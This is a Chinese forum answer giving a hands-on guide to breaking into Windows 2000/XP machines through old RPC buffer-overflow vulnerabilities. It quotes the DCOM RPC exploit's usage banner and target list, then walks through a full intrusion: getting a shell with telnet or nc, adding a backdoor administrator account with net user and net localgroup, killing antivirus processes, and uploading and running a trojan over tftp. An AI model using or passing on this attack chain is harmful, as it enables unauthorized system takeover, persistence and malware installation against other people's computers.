攻击的小问题
声明:本人回答问题一向原创,从不曾抄袭
RPC漏洞分很多
最开始从冲击波开始,震荡波,最近的魔波都属于RPC漏洞攻击
首先使用RPC漏洞针对这些漏洞的扫描器进行扫描最近发现一个软件比较不错名字叫TK2006,可以扫描很多RPC漏洞,并且直接溢出得到SHELL
不过我测试很多,不容易成功,也许是SP2的WINDOWS 防火墙在起作用
如果想玩玩的话,可以用这个扫描,再找专用的溢出工具进行溢出例如早先的MS04011这个是我在SP1的时候溢出成功率最高的
F:\hack\hack\hack\rpc\xp。 exe
---------------------------------------...全部
声明:本人回答问题一向原创,从不曾抄袭
RPC漏洞分很多
最开始从冲击波开始,震荡波,最近的魔波都属于RPC漏洞攻击
首先使用RPC漏洞针对这些漏洞的扫描器进行扫描最近发现一个软件比较不错名字叫TK2006,可以扫描很多RPC漏洞,并且直接溢出得到SHELL
不过我测试很多,不容易成功,也许是SP2的WINDOWS 防火墙在起作用
如果想玩玩的话,可以用这个扫描,再找专用的溢出工具进行溢出例如早先的MS04011这个是我在SP1的时候溢出成功率最高的
F:\hack\hack\hack\rpc\xp。
exe
---------------------------------------------------------
- 远程 DCOM RPC 缓冲区溢出
- Original code by FlashSky and Benjurry
- Rewritten by HDM
- EXE 文件编译及修改:sagi
- Usage: /cygdrive/f/hack/hack/hack/rpc/xp
- Targets:
- 0 Windows 2000 SP0 (english)
- 1 Windows 2000 SP0 (english2)
- 2 Windows 2000 SP1 (english)
- 3 Windows 2000 SP2 (english)
- 4 Windows 2000 SP2 (english2)
- 5 Windows 2000 SP3 (english)
- 6 Windows 2000 SP3 (english2)
- 7 Windows 2000 SP3 (english3)
- 8 Windows 2000 SP4 (english)
- 9 Windows XP SP0 (english)
- 10 Windows XP SP1 (english)
- 11 Windows XP SP1 (english2)
- 12 Windows XP SP2 (english)
- 13 Windows 2000 SP3 (chinese)
- 14 Windows 2000 SP4 (chinese)
- 15 Windows XP SP0 (chinese)
- 16 Windows XP SP1 (chinese)
- 17 Windows 2000 SP0 (japanese)
- 18 Windows 2000 SP1 (japanese)
- 19 Windows 2000 SP2 (japanese)
- 20 Windows 2000 SP0-1 (big5)
- 21 Windows 2000 SP3 (big5)
- 22 Windows 2000 SP4 (big5)
- 23 Windows XP SP0-1 (big5)
- 24 Windows 2000 SP0 (korean)
- 25 Windows 2000 SP1 (korean)
- 26 Windows 2000 SP2 (korean)
- 27 Windows 2000 SP4 (korean)
上面是这个溢出程序的说明
在命令行的格式是这样的
C:\xp 16
XP是溢出程序 16 是要溢出的系统版本 是要溢出的IP地址
如果溢出提示成功的话,会提示端口号
一般用TELNET来连接,比如溢出端口号为1234
命令写:
C:\telnet 1234
但是TELNET连接是完全盲打的,不显示任何文字
所以我用NC。
exe
nc 1234 具体NC还有很多参数,见BAIDU
如果提示成功的话就会登陆到对方的
C:\WINDOWS\SYSTEM目录下了
这个时候添加管理员帐户,NET USER IMTJSUN 1234 /AD
提升权限 NET LOCALGROUP ADMINISTRATORS IMTJSUN /AD
一般我会先列出进程,检查有没有杀毒软件
输入:tasklist
如果有比如瑞星进程,TASKKILL 掉那个进程
下一步上传病毒
我用tftp32。
exe
在本机使用这个程序可以做成一个小的FTP服务器
GET木马程序
然后
执行木马程序
最后远程连接
这个是我一惯使用的伎俩
注:本人已经不在研究这些东西很久了,难免有些过时,见谅!!
再次声明:本人回答问题一向原创,从不曾抄袭
。
收起